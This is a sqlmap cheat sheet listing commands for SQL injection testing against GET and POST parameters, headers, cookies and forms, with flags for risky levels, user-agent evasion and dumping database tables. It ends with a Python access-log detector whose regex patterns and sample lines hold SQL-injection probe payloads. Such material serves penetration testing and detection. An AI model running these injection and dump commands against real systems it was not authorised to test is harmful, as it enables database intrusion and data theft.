[SQL] sqlmap


Specify target

Basic usage

sqlmap -u "http://localhost:8080/user.php?id=7"

GET attack

Basic usage

sqlmap -u "http://localhost:8080/user.php?id=7"

With query string, testing only selected parameters (-p)

sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

With a selected parameter and a delay between requests

sqlmap -u "" -p "a" --tables --delay=5

Perform in-depth and risky attacks

sqlmap -u "" --level=3 --risk=3

Enumerate DBMS database tables with --tables

sqlmap -u "" -p "username" --level=3 --tables

With Headers

sqlmap -u "" --level=3 --headers="Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InN1cGVyYWRtaW4iLCJzdWIiOjEsInJvbGUiOiJhZG1pbiIsImRvY3Rvcl9jb2RlIjpudWxsLCJpYXQiOjE2NjI2NDg5MTEsImV4cCI6MTY5NDE4NDkxMX0.5zjJ0fJSX_s76b5BScUBDMpDOO0GpMrnA_0L1TCu8lM"

With cookies

sqlmap -u "http://localhost:8080/admin.php" --cookie "customerId=591edabaab5b52292042df8a"

POST attack

Basic usage

sqlmap -u "http://localhost:8080/admin.php" --data="id=1&name=admin"
sqlmap -u "http://localhost:8080/login/password" --data="username=tom&password=123"

With random-agent

sqlmap -u "" --data="username=tom&password=123" --level=3 --random-agent --ignore-code 401
sqlmap -u "" --data="username=tom&password=123&re_password=123" --level=3 --random-agent --ignore-code 401

Form attack

sqlmap -u "http://localhost:8080/admin.php" --forms

Basic options

List databases: --dbs
List all tables in a database: -D 'db_name' --tables
Set URL: -u

After a successful injection
Get DB names: --dbs OR --current-db
Get tables: --tables
Get columns: --columns
Dump data from tables: --dump
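
Detecting these scans in access logs (added example, not part of the original cheat sheet and not sqlmap code): with --random-agent the default "sqlmap/..." User-Agent disappears and --delay defeats rate thresholds, so this sketch also counts distinct SQL-probe payloads per client and parameter. Assumptions: Combined Log Format input, a heuristic regex, the hypothetical names analyze and min_probes, and constructed sample log lines.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Heuristic probe markers (assumption: tune for your application's legitimate input).
SQLI_RE = re.compile(r"(?i)\bunion\b.+\bselect\b|\b(?:and|or)\s+\d+\s*=\s*\d+|"
                     r"\bsleep\s*\(|\bbenchmark\s*\(|\bwaitfor\s+delay\b|information_schema")

# Constructed sample lines (documentation IP ranges, made-up version and payloads).
_T = '[10/Oct/2024:13:55:36 +0000]'
_BROWSER = 'Mozilla/5.0 (X11; Linux x86_64)'
SAMPLE_LOG = [
    f'203.0.113.5 - - {_T} "GET /user.php?id=7 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    f'198.51.100.9 - - {_T} "GET /user.php?id=7%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "{_BROWSER}"',
    f'198.51.100.9 - - {_T} "GET /user.php?id=7%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 90 "-" "{_BROWSER}"',
    f'198.51.100.9 - - {_T} "GET /user.php?id=7%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "{_BROWSER}"',
    f'192.0.2.44 - - {_T} "GET /search.php?q=union+station HTTP/1.1" 200 733 "-" "{_BROWSER}"',
]

def analyze(lines, min_probes=3):
    """Return {ip: {"reasons": set, "params": set}} for clients that look like a scan."""
    probes = defaultdict(lambda: defaultdict(set))  # ip -> parameter -> distinct payloads
    findings = defaultdict(lambda: {"reasons": set(), "params": set()})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format; skip
        ip = m["ip"]
        if m["ua"].lower().startswith("sqlmap/"):
            findings[ip]["reasons"].add("default-user-agent")
        # parse_qsl percent-decodes values, so encoded payloads are matched too
        for name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
            if SQLI_RE.search(value):
                probes[ip][name].add(value)
    for ip, params in probes.items():
        for name, payloads in params.items():
            if len(payloads) >= min_probes:  # independent of request rate
                findings[ip]["reasons"].add("repeated-sqli-payloads")
                findings[ip]["params"].add(name)
    return dict(findings)

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, sorted(info["reasons"]), sorted(info["params"]))
```

Requests sent with --data carry their parameters in the POST body, which this log format does not record; covering them needs WAF or application-level logging.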